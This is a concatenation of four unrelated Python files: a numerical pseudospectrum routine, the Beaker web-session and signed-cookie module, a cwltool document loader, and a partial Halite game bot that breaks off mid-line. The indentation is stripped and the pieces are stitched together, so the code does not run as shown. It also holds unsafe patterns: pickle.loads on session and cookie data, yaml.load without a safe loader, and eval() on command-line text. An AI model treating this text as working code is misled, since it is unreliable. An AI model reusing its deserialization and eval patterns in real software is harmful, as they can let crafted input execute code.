    be computed with full precision (up to the given number of digits), but the returned singular value will be represented as np.float128.
:type A: numpy.array, 2D list of shape (n,m)
:type bbox: a list or a function returning list
:type ppd: int
:type ncpu: int
:type digits: int
    :returns: a numpy array of epsilon-pseudospectrum values with shape (ppd, ppd), plus the X and Y 2D arrays of grid points at which each value was computed (X, Y are created via numpy.meshgrid).
:Example:
>>> from mpseudo import pseudo
>>> A = [[-9, 11, -21, 63, -252],
[70, -69, 141, -421, 1684],
[-575, 575, -1149, 3451, -13801],
[3891, -3891, 7782, -23345, 93365],
[1024, -1024, 2048, -6144, 24572]]
>>> psa, X, Y = pseudo(A, ncpu=3, digits=100, ppd=100, bbox=[-0.05,0.05,-0.05,0.05])
You can use contourf function from matplotlib to plot pseudospectra:
>>> from pylab import *
>>> contourf(X, Y, psa)
>>> show()
'''
n, m = np.shape(A)
    assert max(n, m) > 1, 'Matrices of size 1x1 are not allowed.'
if hasattr(bbox, '__iter__'):
bounds = _safe_bbox(bbox, A)
elif hasattr(bbox, '__call__'):
try:
bounds = _safe_bbox(bbox(A), A)
        except Exception:
bounds = gersgorin_bounds(A)
warnings.warn('Invalid bbox-function.\
Gershgorin circles will be used.', RuntimeWarning)
else:
bounds = gersgorin_bounds(A)
_nc = multiprocessing.cpu_count()
if not ncpu:
ncpu = 1
warnings.warn('The number of cpu-cores is not defined.\
Default (ncpu = 1) value will be used.', RuntimeWarning)
elif ncpu >= _nc and _nc > 1:
ncpu = _nc - 1
else:
ncpu = 1
x = np.linspace(bounds[0], bounds[1], ppd)
y = np.linspace(bounds[2], bounds[3], ppd)
X, Y = np.meshgrid(x, y)
yars = np.array_split(Y.ravel(), ncpu)
xars = np.array_split(X.ravel(), ncpu)
pool = multiprocessing.Pool(processes=ncpu)
results = pool.map(_pseudo_worker,
[(i, digits, A, xars[i], yars[i], n, m)
for i in range(ncpu)]
)
pool.close()
pool.join()
pseudo_res = []
for i in range(ncpu):
pseudo_res.extend(list(filter(lambda x: x[0] == i, results))[0][1])
return (np.reshape(pseudo_res, (ppd, ppd))/np.linalg.norm(A), X, Y)
if __name__ == '__main__':
A = [[-9, 11, -21, 63, -252],
[70, -69, 141, -421, 1684],
[-575, 575, -1149, 3451, -13801],
[3891, -3891, 7782, -23345, 93365],
[1024, -1024, 2048, -6144, 24572]]
psa, X, Y = pseudo(A, ncpu=None, digits=100,
ppd=100, bbox=[-0.05, 0.05, -0.05, 0.05]
)
print('Pseudospectra of the matrix A ' +
str(A) + ' was computed successfully.')
|
|
from ._compat import PY2, pickle, http_cookies, unicode_text, b64encode, b64decode
import os
import time
from datetime import datetime, timedelta
from beaker.crypto import hmac as HMAC, hmac_sha1 as SHA1, sha1
from beaker import crypto, util
from beaker.cache import clsmap
from beaker.exceptions import BeakerException, InvalidCryptoBackendError
__all__ = ['SignedCookie', 'Session']
try:
import uuid
def _session_id():
return uuid.uuid4().hex
except ImportError:
import random
if hasattr(os, 'getpid'):
getpid = os.getpid
else:
def getpid():
return ''
def _session_id():
id_str = "%f%s%f%s" % (
time.time(),
id({}),
random.random(),
getpid()
)
# NB: nothing against second parameter to b64encode, but it seems
# to be slower than simple chained replacement
if not PY2:
raw_id = b64encode(sha1(id_str.encode('ascii')).digest())
return str(raw_id.replace(b'+', b'-').replace(b'/', b'_').rstrip(b'='))
else:
raw_id = b64encode(sha1(id_str).digest())
return raw_id.replace('+', '-').replace('/', '_').rstrip('=')
class SignedCookie(http_cookies.BaseCookie):
"""Extends python cookie to give digital signature support"""
def __init__(self, secret, input=None):
self.secret = secret.encode('UTF-8')
http_cookies.BaseCookie.__init__(self, input)
def value_decode(self, val):
val = val.strip('"')
sig = HMAC.new(self.secret, val[40:].encode('utf-8'), SHA1).hexdigest()
# Avoid timing attacks
invalid_bits = 0
input_sig = val[:40]
if len(sig) != len(input_sig):
return None, val
for a, b in zip(sig, input_sig):
invalid_bits += a != b
if invalid_bits:
return None, val
else:
return val[40:], val
def value_encode(self, val):
sig = HMAC.new(self.secret, val.encode('utf-8'), SHA1).hexdigest()
return str(val), ("%s%s" % (sig, val))
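# Note on the signed value format produced above: value_encode() prepends a
# 40-character hex HMAC-SHA1 signature to the raw value, and value_decode()
# re-computes the signature over everything after the first 40 characters,
# comparing the two character by character so the comparison takes roughly the
# same time whether a mismatch occurs early or late (mitigating timing attacks).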
class Session(dict):
"""Session object that uses container package for storage.
:param invalidate_corrupt: How to handle corrupt data when loading. When
set to True, then corrupt data will be silently
invalidated and a new session created,
otherwise invalid data will cause an exception.
:type invalidate_corrupt: bool
:param use_cookies: Whether or not cookies should be created. When set to
False, it is assumed the user will handle storing the
session on their own.
:type use_cookies: bool
:param type: What data backend type should be used to store the underlying
session data
:param key: The name the cookie should be set to.
:param timeout: How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
:type timeout: int
:param cookie_expires: Expiration date for cookie
:param cookie_domain: Domain to use for the cookie.
:param cookie_path: Path to use for the cookie.
:param secure: Whether or not the cookie should only be sent over SSL.
:param httponly: Whether or not the cookie should only be accessible by
                     the browser and not by JavaScript.
:param encrypt_key: The key to use for the local session encryption, if not
provided the session will not be encrypted.
:param validate_key: The key used to sign the local encrypted session
"""
def __init__(self, request, id=None, invalidate_corrupt=False,
use_cookies=True, type=None, data_dir=None,
key='beaker.session.id', timeout=None, cookie_expires=True,
cookie_domain=None, cookie_path='/', secret=None,
secure=False, namespace_class=None, httponly=False,
encrypt_key=None, validate_key=None, **namespace_args):
if not type:
if data_dir:
self.type = 'file'
else:
self.type = 'memory'
else:
self.type = type
self.namespace_class = namespace_class or clsmap[self.type]
self.namespace_args = namespace_args
self.request = request
self.data_dir = data_dir
self.key = key
self.timeout = timeout
self.use_cookies = use_cookies
self.cookie_expires = cookie_expires
# Default cookie domain/path
self._domain = cookie_domain
self._path = cookie_path
self.was_invalidated = False
self.secret = secret
self.secure = secure
self.httponly = httponly
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.id = id
self.accessed_dict = {}
self.invalidate_corrupt = invalidate_corrupt
if self.use_cookies:
cookieheader = request.get('cookie', '')
if secret:
try:
self.cookie = SignedCookie(secret, input=cookieheader)
except http_cookies.CookieError:
self.cookie = SignedCookie(secret, input=None)
else:
self.cookie = http_cookies.SimpleCookie(input=cookieheader)
if not self.id and self.key in self.cookie:
self.id = self.cookie[self.key].value
self.is_new = self.id is None
if self.is_new:
self._create_id()
self['_accessed_time'] = self['_creation_time'] = time.time()
else:
try:
self.load()
except Exception as e:
if invalidate_corrupt:
util.warn(
"Invalidating corrupt session %s; "
"error was: %s. Set invalidate_corrupt=False "
"to propagate this exception." % (self.id, e))
self.invalidate()
else:
raise
def has_key(self, name):
return name in self
def _set_cookie_values(self, expires=None):
self.cookie[self.key] = self.id
if self._domain:
self.cookie[self.key]['domain'] = self._domain
if self.secure:
self.cookie[self.key]['secure'] = True
self._set_cookie_http_only()
self.cookie[self.key]['path'] = self._path
self._set_cookie_expires(expires)
def _set_cookie_expires(self, expires):
if expires is None:
if self.cookie_expires is not True:
if self.cookie_expires is False:
expires = datetime.fromtimestamp(0x7FFFFFFF)
elif isinstance(self.cookie_expires, timedelta):
expires = datetime.utcnow() + self.cookie_expires
elif isinstance(self.cookie_expires, datetime):
expires = self.cookie_expires
else:
raise ValueError("Invalid argument for cookie_expires: %s"
% repr(self.cookie_expires))
else:
expires = None
if expires is not None:
if not self.cookie or self.key not in self.cookie:
self.cookie[self.key] = self.id
self.cookie[self.key]['expires'] = \
expires.strftime("%a, %d-%b-%Y %H:%M:%S GMT")
return expires
def _update_cookie_out(self, set_cookie=True):
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = set_cookie
def _set_cookie_http_only(self):
try:
if self.httponly:
self.cookie[self.key]['httponly'] = True
except http_cookies.CookieError as e:
if 'Invalid Attribute httponly' not in str(e):
raise
util.warn('Python 2.6+ is required to use httponly')
def _create_id(self, set_new=True):
self.id = _session_id()
if set_new:
self.is_new = True
self.last_accessed = None
if self.use_cookies:
self._set_cookie_values()
sc = set_new is False
self._update_cookie_out(set_cookie=sc)
@property
def created(self):
return self['_creation_time']
def _set_domain(self, domain):
self['_domain'] = domain
self.cookie[self.key]['domain'] = domain
self._update_cookie_out()
def _get_domain(self):
return self._domain
domain = property(_get_domain, _set_domain)
def _set_path(self, path):
self['_path'] = self._path = path
self.cookie[self.key]['path'] = path
self._update_cookie_out()
def _get_path(self):
return self._path
path = property(_get_path, _set_path)
def _encrypt_data(self, session_data=None):
"""Serialize, encipher, and base64 the session dict"""
session_data = session_data or self.copy()
if self.encrypt_key:
nonce = b64encode(os.urandom(6))[:8]
encrypt_key = crypto.generateCryptoKeys(self.encrypt_key,
self.validate_key + nonce, 1)
data = pickle.dumps(session_data, 2)
return nonce + b64encode(crypto.aesEncrypt(data, encrypt_key))
else:
data = pickle.dumps(session_data, 2)
return b64encode(data)
def _decrypt_data(self, session_data):
"""Bas64, decipher, then un-serialize the data for the session
dict"""
if self.encrypt_key:
try:
nonce = session_data[:8]
encrypt_key = crypto.generateCryptoKeys(self.encrypt_key,
self.validate_key + nonce, 1)
payload = b64decode(session_data[8:])
data = crypto.aesDecrypt(payload, encrypt_key)
except:
# As much as I hate a bare except, we get some insane errors
# here that get tossed when crypto fails, so we raise the
# 'right' exception
if self.invalidate_corrupt:
return None
else:
raise
try:
return pickle.loads(data)
except:
if self.invalidate_corrupt:
return None
else:
raise
else:
data = b64decode(session_data)
return pickle.loads(data)
def _delete_cookie(self):
self.request['set_cookie'] = True
expires = datetime.utcnow() - timedelta(365)
self._set_cookie_values(expires)
self._update_cookie_out()
def delete(self):
"""Deletes the session from the persistent storage, and sends
an expired cookie out"""
if self.use_cookies:
self._delete_cookie()
self.clear()
def invalidate(self):
"""Invalidates this session, creates a new session id, returns
to the is_new state"""
self.clear()
self.was_invalidated = True
self._create_id()
self.load()
def load(self):
"Loads the data from this session from persistent storage"
self.namespace = self.namespace_class(self.id,
data_dir=self.data_dir,
digest_filenames=False,
**self.namespace_args)
now = time.time()
if self.use_cookies:
self.request['set_cookie'] = True
self.namespace.acquire_read_lock()
timed_out = False
try:
self.clear()
try:
session_data = self.namespace['session']
if (session_data is not None and self.encrypt_key):
session_data = self._decrypt_data(session_data)
                # Memcached always returns a key; it's None when it's not
                # present
if session_data is None:
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
except (KeyError, TypeError):
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
if session_data is None or len(session_data) == 0:
session_data = {
'_creation_time': now,
'_accessed_time': now
}
self.is_new = True
if self.timeout is not None and \
now - session_data['_accessed_time'] > self.timeout:
timed_out = True
else:
                # Properly set the last_accessed time, which is different
                # from the *current* _accessed_time
if self.is_new or '_accessed_time' not in session_data:
self.last_accessed = None
else:
self.last_accessed = session_data['_accessed_time']
# Update the current _accessed_time
session_data['_accessed_time'] = now
# Set the path if applicable
if '_path' in session_data:
self._path = session_data['_path']
self.update(session_data)
self.accessed_dict = session_data.copy()
finally:
self.namespace.release_read_lock()
if timed_out:
self.invalidate()
def save(self, accessed_only=False):
"""Saves the data for this session to persistent storage
If accessed_only is True, then only the original data loaded
at the beginning of the request will be saved, with the updated
last accessed time.
"""
        # Look to see if it's a new session that was only accessed;
        # don't save it in that case
if accessed_only and self.is_new:
return None
# this session might not have a namespace yet or the session id
# might have been regenerated
if not hasattr(self, 'namespace') or self.namespace.namespace != self.id:
self.namespace = self.namespace_class(
self.id,
data_dir=self.data_dir,
digest_filenames=False,
**self.namespace_args)
self.namespace.acquire_write_lock(replace=True)
try:
if accessed_only:
data = dict(self.accessed_dict.items())
else:
data = dict(self.items())
if self.encrypt_key:
data = self._encrypt_data(data)
# Save the data
if not data and 'session' in self.namespace:
del self.namespace['session']
else:
self.namespace['session'] = data
finally:
self.namespace.release_write_lock()
if self.use_cookies and self.is_new:
self.request['set_cookie'] = True
def revert(self):
"""Revert the session to its original state from its first
access in the request"""
self.clear()
self.update(self.accessed_dict)
def regenerate_id(self):
"""
        Creates a new session id while retaining all session data.
        It's a good security practice to regenerate the id after a client
        elevates privileges.
"""
self._create_id(set_new=False)
# TODO: I think both these methods should be removed. They're from
    # the original mod_python code I was ripping off but they really
# have no use here.
def lock(self):
"""Locks this session against other processes/threads. This is
automatic when load/save is called.
***use with caution*** and always with a corresponding 'unlock'
inside a "finally:" block, as a stray lock typically cannot be
unlocked without shutting down the whole application.
"""
self.namespace.acquire_write_lock()
def unlock(self):
"""Unlocks this session against other processes/threads. This
is automatic when load/save is called.
***use with caution*** and always within a "finally:" block, as
a stray lock typically cannot be unlocked without shutting down
the whole application.
"""
self.namespace.release_write_lock()
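# Illustrative sketch only (not part of the original module): driving Session
# directly with a plain dict standing in for the request. With no type and no
# data_dir it falls back to the in-memory backend; the secret and stored key
# below are arbitrary.
def _example_memory_session():
    request = {'cookie': ''}
    session = Session(request, secret='not-so-secret')
    session['counter'] = session.get('counter', 0) + 1
    session.save()
    # _create_id() already prepared the outgoing Set-Cookie header
    return session.id, request.get('cookie_out')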
class CookieSession(Session):
"""Pure cookie-based session
Options recognized when using cookie-based sessions are slightly
more restricted than general sessions.
:param key: The name the cookie should be set to.
:param timeout: How long session data is considered valid. This is used
regardless of the cookie being present or not to determine
whether session data is still valid.
:type timeout: int
:param cookie_expires: Expiration date for cookie
:param cookie_domain: Domain to use for the cookie.
:param cookie_path: Path to use for the cookie.
:param secure: Whether or not the cookie should only be sent over SSL.
:param httponly: Whether or not the cookie should only be accessible by
                     the browser and not by JavaScript.
:param encrypt_key: The key to use for the local session encryption, if not
provided the session will not be encrypted.
:param validate_key: The key used to sign the local encrypted session
"""
def __init__(self, request, key='beaker.session.id', timeout=None,
cookie_expires=True, cookie_domain=None, cookie_path='/',
encrypt_key=None, validate_key=None, secure=False,
httponly=False, **kwargs):
if not crypto.has_aes and encrypt_key:
raise InvalidCryptoBackendError("No AES library is installed, can't generate "
"encrypted cookie-only Session.")
self.request = request
self.key = key
self.timeout = timeout
self.cookie_expires = cookie_expires
self.encrypt_key = encrypt_key
self.validate_key = validate_key
self.request['set_cookie'] = False
self.secure = secure
self.httponly = httponly
self._domain = cookie_domain
self._path = cookie_path
try:
cookieheader = request['cookie']
except KeyError:
cookieheader = ''
if validate_key is None:
raise BeakerException("No validate_key specified for Cookie only "
"Session.")
try:
self.cookie = SignedCookie(validate_key, input=cookieheader)
except http_cookies.CookieError:
self.cookie = SignedCookie(validate_key, input=None)
self['_id'] = _session_id()
self.is_new = True
# If we have a cookie, load it
if self.key in self.cookie and self.cookie[self.key].value is not None:
self.is_new = False
try:
cookie_data = self.cookie[self.key].value
self.update(self._decrypt_data(cookie_data))
self._path = self.get('_path', '/')
except:
pass
if self.timeout is not None:
now = time.time()
last_accessed_time = self.get('_accessed_time', now)
if now - last_accessed_time > self.timeout:
self.clear()
self.accessed_dict = self.copy()
self._create_cookie()
def created(self):
return self['_creation_time']
created = property(created)
def id(self):
return self['_id']
id = property(id)
def _set_domain(self, domain):
self['_domain'] = domain
self._domain = domain
def _get_domain(self):
return self._domain
domain = property(_get_domain, _set_domain)
def _set_path(self, path):
self['_path'] = self._path = path
def _get_path(self):
return self._path
path = property(_get_path, _set_path)
def save(self, accessed_only=False):
"""Saves the data for this session to persistent storage"""
if accessed_only and self.is_new:
return
if accessed_only:
self.clear()
self.update(self.accessed_dict)
self._create_cookie()
def expire(self):
"""Delete the 'expires' attribute on this Session, if any."""
self.pop('_expires', None)
def _create_cookie(self):
if '_creation_time' not in self:
self['_creation_time'] = time.time()
if '_id' not in self:
self['_id'] = _session_id()
self['_accessed_time'] = time.time()
val = self._encrypt_data()
if len(val) > 4064:
raise BeakerException("Cookie value is too long to store")
self.cookie[self.key] = val
if '_expires' in self:
expires = self['_expires']
else:
expires = None
expires = self._set_cookie_expires(expires)
if expires is not None:
self['_expires'] = expires
if '_domain' in self:
self.cookie[self.key]['domain'] = self['_domain']
elif self._domain:
self.cookie[self.key]['domain'] = self._domain
if self.secure:
self.cookie[self.key]['secure'] = True
self._set_cookie_http_only()
self.cookie[self.key]['path'] = self.get('_path', '/')
self.request['cookie_out'] = self.cookie[self.key].output(header='')
self.request['set_cookie'] = True
def delete(self):
"""Delete the cookie, and clear the session"""
# Send a delete cookie request
self._delete_cookie()
self.clear()
def invalidate(self):
"""Clear the contents and start a new session"""
self.clear()
self['_id'] = _session_id()
class SessionObject(object):
"""Session proxy/lazy creator
This object proxies access to the actual session object, so that in
the case that the session hasn't been used before, it will be
    set up. This avoids creating and loading the session from persistent
    storage unless it's actually used during the request.
"""
def __init__(self, environ, **params):
self.__dict__['_params'] = params
self.__dict__['_environ'] = environ
self.__dict__['_sess'] = None
self.__dict__['_headers'] = {}
def _session(self):
"""Lazy initial creation of session object"""
if self.__dict__['_sess'] is None:
params = self.__dict__['_params']
environ = self.__dict__['_environ']
self.__dict__['_headers'] = req = {'cookie_out': None}
req['cookie'] = environ.get('HTTP_COOKIE')
if params.get('type') == 'cookie':
self.__dict__['_sess'] = CookieSession(req, **params)
else:
self.__dict__['_sess'] = Session(req, **params)
return self.__dict__['_sess']
def __getattr__(self, attr):
return getattr(self._session(), attr)
def __setattr__(self, attr, value):
setattr(self._session(), attr, value)
def __delattr__(self, name):
self._session().__delattr__(name)
def __getitem__(self, key):
return self._session()[key]
def __setitem__(self, key, value):
self._session()[key] = value
def __delitem__(self, key):
self._session().__delitem__(key)
def __repr__(self):
return self._session().__repr__()
def __iter__(self):
"""Only works for proxying to a dict"""
return iter(self._session().keys())
def __contains__(self, key):
return key in self._session()
def has_key(self, key):
return key in self._session()
def get_by_id(self, id):
"""Loads a session given a session ID"""
params = self.__dict__['_params']
session = Session({}, use_cookies=False, id=id, **params)
if session.is_new:
return None
return session
def save(self):
self.__dict__['_dirty'] = True
def delete(self):
self.__dict__['_dirty'] = True
self._session().delete()
def persist(self):
"""Persist the session to the storage
        If it's set to autosave, then the entire session will be saved
        regardless of whether save() has been called. Otherwise, just the
accessed time will be updated if save() was not called, or
the session will be saved if save() was called.
"""
if self.__dict__['_params'].get('auto'):
self._session().save()
else:
if self.__dict__.get('_dirty'):
self._session().save()
else:
self._session().save(accessed_only=True)
def dirty(self):
return self.__dict__.get('_dirty', False)
def accessed(self):
"""Returns whether or not the session has been accessed"""
return self.__dict__['_sess'] is not None
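# Illustrative sketch only (not part of the original module): the typical WSGI
# flow around SessionObject, assuming `environ` is a WSGI environ dict. The
# session is created lazily on first access and written out via persist().
def _example_session_object_usage(environ):
    session = SessionObject(environ, type='memory')
    session['visits'] = session.get('visits', 0) + 1
    session.save()       # marks the proxy dirty, so persist() does a full save
    session.persist()    # saves the session and prepares the Set-Cookie header
    return session.__dict__['_headers'].get('cookie_out')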
|
|
import os
import json
import hashlib
import logging
import collections
import requests
import urlparse
import yaml
import validate
log = logging.getLogger("cwltool")
class NormDict(dict):
def __init__(self, normalize=unicode):
super(NormDict, self).__init__()
self.normalize = normalize
def __getitem__(self, key):
return super(NormDict, self).__getitem__(self.normalize(key))
def __setitem__(self, key, value):
return super(NormDict, self).__setitem__(self.normalize(key), value)
def __delitem__(self, key):
return super(NormDict, self).__delitem__(self.normalize(key))
def __contains__(self, key):
return super(NormDict, self).__contains__(self.normalize(key))
def expand_url(url, base_url):
split = urlparse.urlparse(url)
if split.scheme:
return url
else:
return urlparse.urljoin(base_url, url)
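# Illustrative sketch only (not part of the original module): relative
# references are joined onto the base document URL, absolute ones come back
# unchanged. The URLs below are made up for the example.
def _example_expand_url():
    base = "file:///home/user/workflow.cwl"
    assert expand_url("#main", base) == "file:///home/user/workflow.cwl#main"
    assert expand_url("http://example.com/tool.cwl", base) == "http://example.com/tool.cwl"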
class Loader(object):
def __init__(self):
normalize = lambda url: urlparse.urlsplit(url).geturl()
self.idx = NormDict(normalize)
self.url_fields = []
def resolve_ref(self, ref, base_url=None):
base_url = base_url or 'file://%s/' % os.path.abspath('.')
obj = None
# If `ref` is a dict, look for special directives.
if isinstance(ref, dict):
obj = ref
if "import" in ref:
if len(obj) == 1:
ref = obj["import"]
obj = None
else:
raise ValueError("'import' must be the only field in %s" % (str(obj)))
elif "include" in obj:
if len(obj) == 1:
ref = obj["include"]
else:
raise ValueError("'include' must be the only field in %s" % (str(obj)))
else:
if "id" in obj:
ref = obj["id"]
else:
raise ValueError("Object `%s` does not have `id` field" % obj)
if not isinstance(ref, basestring):
raise ValueError("Must be string: `%s`" % str(ref))
url = expand_url(ref, base_url)
# Has this reference been loaded already?
if url in self.idx:
return self.idx[url]
# "include" directive means load raw text
if obj and "include" in obj:
return self.fetch_text(url)
if obj:
obj["id"] = url
self.idx[url] = obj
else:
# Load structured document
doc_url, frg = urlparse.urldefrag(url)
if doc_url in self.idx:
raise validate.ValidationException("Reference `#%s` not found in file `%s`." % (frg, doc_url))
obj = self.fetch(doc_url)
# Recursively expand urls and resolve directives
self.resolve_all(obj, url)
# Requested reference should be in the index now, otherwise it's a bad reference
if self.idx.get(url) is not None:
return self.idx[url]
else:
raise RuntimeError("Reference `%s` is not in the index. Index contains:\n %s" % (url, "\n ".join(self.idx)))
def resolve_all(self, document, base_url):
if isinstance(document, list):
iterator = enumerate(document)
elif isinstance(document, dict):
inc = 'include' in document
if 'id' in document or 'import' in document or 'include' in document:
document = self.resolve_ref(document, base_url)
if inc:
return document
for d in self.url_fields:
if d in document:
if isinstance(document[d], basestring):
document[d] = expand_url(document[d], base_url)
elif isinstance(document[d], list):
document[d] = [expand_url(url, base_url) if isinstance(url, basestring) else url for url in document[d] ]
iterator = document.iteritems()
else:
return document
for key, val in iterator:
try:
document[key] = self.resolve_all(val, base_url)
except validate.ValidationException as v:
if isinstance(key, basestring):
raise validate.ValidationException("Validation error in field %s:\n%s" % (key, validate.indent(str(v))))
else:
raise validate.ValidationException("Validation error in position %i:\n%s" % (key, validate.indent(str(v))))
return document
def fetch_text(self, url):
split = urlparse.urlsplit(url)
scheme, path = split.scheme, split.path
if scheme in ['http', 'https'] and requests:
resp = requests.get(url)
try:
resp.raise_for_status()
except Exception as e:
raise RuntimeError(url, e)
return resp.text
elif scheme == 'file':
try:
with open(path) as fp:
return fp.read().decode("utf-8")
except (OSError, IOError) as e:
raise RuntimeError('Error reading %s %s' % (url, e))
else:
raise ValueError('Unsupported scheme in url: %s' % url)
def fetch(self, url):
if url in self.idx:
return self.idx[url]
try:
result = yaml.load(self.fetch_text(url))
except yaml.parser.ParserError as e:
raise validate.ValidationException("Error loading '%s' %s" % (url, str(e)))
if isinstance(result, dict):
if "id" not in result:
result["id"] = url
self.idx[expand_url(result["id"], url)] = result
else:
self.idx[url] = result
return result
def validate_links(self, document):
if isinstance(document, list):
iterator = enumerate(document)
elif isinstance(document, dict):
for d in self.url_fields:
if d in document:
if isinstance(document[d], basestring):
if document[d] not in self.idx:
raise validate.ValidationException("Invalid link `%s` in field `%s`" % (document[d], d))
elif isinstance(document[d], list):
for i in document[d]:
if isinstance(i, basestring) and i not in self.idx:
raise validate.ValidationException("Invalid link `%s` in field `%s`" % (i, d))
iterator = document.iteritems()
else:
return
try:
for key, val in iterator:
self.validate_links(val)
except validate.ValidationException as v:
if isinstance(key, basestring):
raise validate.ValidationException("At field `%s`\n%s" % (key, validate.indent(str(v))))
else:
raise validate.ValidationException("At position %s\n%s" % (key, validate.indent(str(v))))
return
POINTER_DEFAULT = object()
def resolve_json_pointer(document, pointer, default=POINTER_DEFAULT):
parts = urlparse.unquote(pointer.lstrip('/#')).split('/') \
if pointer else []
for part in parts:
if isinstance(document, collections.Sequence):
try:
part = int(part)
except ValueError:
pass
try:
document = document[part]
except:
if default != POINTER_DEFAULT:
return default
else:
raise ValueError('Unresolvable JSON pointer: %r' % pointer)
return document
loader = Loader()
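# Illustrative sketch only (not part of the original module): JSON pointers walk
# dict keys and integer list indices; passing a default suppresses the
# ValueError raised for unresolvable pointers. The document is made up.
def _example_resolve_json_pointer():
    doc = {"steps": [{"id": "step0"}, {"id": "step1"}]}
    assert resolve_json_pointer(doc, "/steps/1/id") == "step1"
    assert resolve_json_pointer(doc, "/steps/5/id", default=None) is None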
|
|
import hlt
import numpy as np
import pandas as pd
from time import time
import itertools
import os
import sys
args = ' '.join(sys.argv)
if 'define' in args:
overrides = eval(args.split('define')[1].strip())
TIME_LIMIT = 1.9
nav_angles = np.array([-np.array(list(range(0, 35, 1)) + list(range(35, 120, 3))), 1+np.array(list(range(0, 35, 1)) + list(range(35, 120, 3)))]).T.flatten()
nav_rads = np.deg2rad(nav_angles)
def compute_distance_matrix(rows, cols): #warning, reverse compared to previous
B = rows
A = cols
dx = A.x.values[None] - B.x.values[:, None]
dy = A.y.values[None] - B.y.values[:, None]
return np.sqrt(np.square(dx) + np.square(dy))
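# Illustrative sketch only (not part of the original bot): the helper returns a
# (len(rows), len(cols)) array of pairwise Euclidean distances between the x/y
# columns of two DataFrames. The toy frames below are made up.
def _example_compute_distance_matrix():
    rows = pd.DataFrame({'x': [0.0, 3.0], 'y': [0.0, 4.0]})
    cols = pd.DataFrame({'x': [0.0], 'y': [0.0]})
    d = compute_distance_matrix(rows, cols)
    assert d.shape == (2, 1) and np.isclose(d[1, 0], 5.0)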
def ccw(A,B,C):
return (C.y-A.y) * (B.x-A.x) > (B.y-A.y) * (C.x-A.x)
# Return true if line segments AB and CD intersect
def intersect(A,B,C,D):
return ccw(A,C,D) != ccw(B,C,D) and ccw(A,B,C) != ccw(A,B,D)
def intersect_segment_circle(start, ex, ey, circle, *, fudge=1.0):
sx = start.x
sy = start.y
worker_radius = start.radius
cx = circle.x
cy = circle.y
cr = circle.radius + worker_radius + fudge
dx = ex - sx
dy = ey - sy
a = dx ** 2 + dy ** 2
b = (sx ** 2 + sy ** 2 - sx * cx - sy * cy + ex * (cx - sx) + ey * (cy - sy))
t = np.clip(b / (a + 1e-8), 0.0, 1.0)
closest_x = sx + dx * t
closest_y = sy + dy * t
closest_distance = (closest_x - cx) ** 2 + (closest_y - cy) ** 2
return (closest_distance <= cr ** 2)
from collections import namedtuple
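# Illustrative sketch only (not part of the original bot): a straight move from
# (0, 0) towards (10, 0) is blocked by a circle of radius 1 at (5, 0) but not
# by one at (5, 5); the default fudge of 1.0 pads the blocking radius.
def _example_intersect_segment_circle():
    pos = namedtuple('pos', 'x y radius')
    start = pos(0.0, 0.0, 0.5)
    assert intersect_segment_circle(start, 10.0, 0.0, pos(5.0, 0.0, 1.0))
    assert not intersect_segment_circle(start, 10.0, 0.0, pos(5.0, 5.0, 1.0))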
class Squad:
def __init__(self, member_ids, accuracy=0.85, scale=1.25, fudge=0.15):
self.accuracy = accuracy
self.r = scale
self.fudge = fudge
self.member_ids = member_ids
self.formation = scale * pd.DataFrame(np.array([
[np.cos(np.deg2rad(30)) - np.sqrt(1 / 3), np.sin(np.deg2rad(30))],
[-np.sqrt(1 / 3), 0],
[np.cos(np.deg2rad(-30)) - np.sqrt(1 / 3), np.sin(np.deg2rad(-30))]
]))
self.radius = scale * np.sqrt(1/3) + hlt.constants.SHIP_RADIUS # FIXME
def move(self, bot, x, y):
v = np.array([x, y])
orig = bot.ships.loc[self.member_ids][['x', 'y']].copy()
disp = orig.mean() - orig
target = namedtuple('pos', 'x y radius')(*v, 0.5)
worker = namedtuple('pos', 'x y radius')(*orig.mean().values, self.radius)
v = v - orig.mean()
dist_target = np.sqrt(v.dot(v)) - 3.8
try:
theta = bot.find_clear_rads(target, worker, min(20.0, dist_target))[0]
except:
theta = np.arctan2(*(v / np.sqrt(v.dot(v)))[::-1])
# if bot.turn_count < 2:
# theta = 1.0
# dist_target = 0.01
#
# if hasattr(self, 'theta') and bot.turn_count >= 2:
# dtheta = (theta - self.theta) % (2*np.pi)
# theta = self.theta + np.clip(dtheta, -0.5, 0.5)
self.theta = theta
# assert len(self.member_ids) == 3
# R = np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])
beta = 0.0
R = np.array([[np.cos(beta), -np.sin(beta)], [np.sin(beta), np.cos(beta)]])
# ordering = [2,1,0]
# self.ordering = ordering
formation = self.formation.copy()
formation = formation.iloc[:len(self.member_ids)]
formation = formation - formation.mean() # assumes we want it centered
formation = formation.dot(R.T)
formation.columns = ['x', 'y']
# if not hasattr(self, 'ordering'):
# d = compute_distance_matrix(formation, disp)
#
# perms = np.array(list(itertools.permutations(range(len(formation)))))
# def nonintersect(ordering):
# startpoints = orig.iloc[ordering]
# endpoints = orig.iloc[ordering] + disp.iloc[ordering] + formation.values
# return not (intersect(startpoints.iloc[ordering[0]], endpoints.iloc[ordering[0]], startpoints.iloc[ordering[1]], endpoints.iloc[ordering[1]]) or
# intersect(startpoints.iloc[ordering[2]], endpoints.iloc[ordering[2]], startpoints.iloc[ordering[1]], endpoints.iloc[ordering[1]]) or
# intersect(startpoints.iloc[ordering[0]], endpoints.iloc[ordering[0]], startpoints.iloc[ordering[2]], endpoints.iloc[ordering[2]]))
# ordering = perms[np.argmin([d[list(p)].trace() for p in perms if nonintersect(p)])]
# self.ordering = ordering
# else:
# ordering = self.ordering
#
# ordering = [o for o in ordering if o <len(self.member_ids)]
#
# disp = disp.iloc[ordering]
# orig = orig.iloc[ordering]
found = False
# direction = (v / np.sqrt(v.dot(v)))
direction = np.array([np.cos(theta), np.sin(theta)])
for vshift in np.transpose(direction[:, None] * np.linspace(min(8.5, dist_target), 2, 100)):
dd = disp + formation.values + vshift
intthrust = np.round(dd.apply(np.linalg.norm, axis=1, raw=True)).astype(int)
if intthrust.max() > 7:
continue
intangle = np.round(np.rad2deg(dd.apply(lambda x: np.arctan2(*x[::-1]), axis=1, raw=True))).astype(int)
shift = np.transpose([intthrust.values * np.cos(np.deg2rad(intangle.values)),
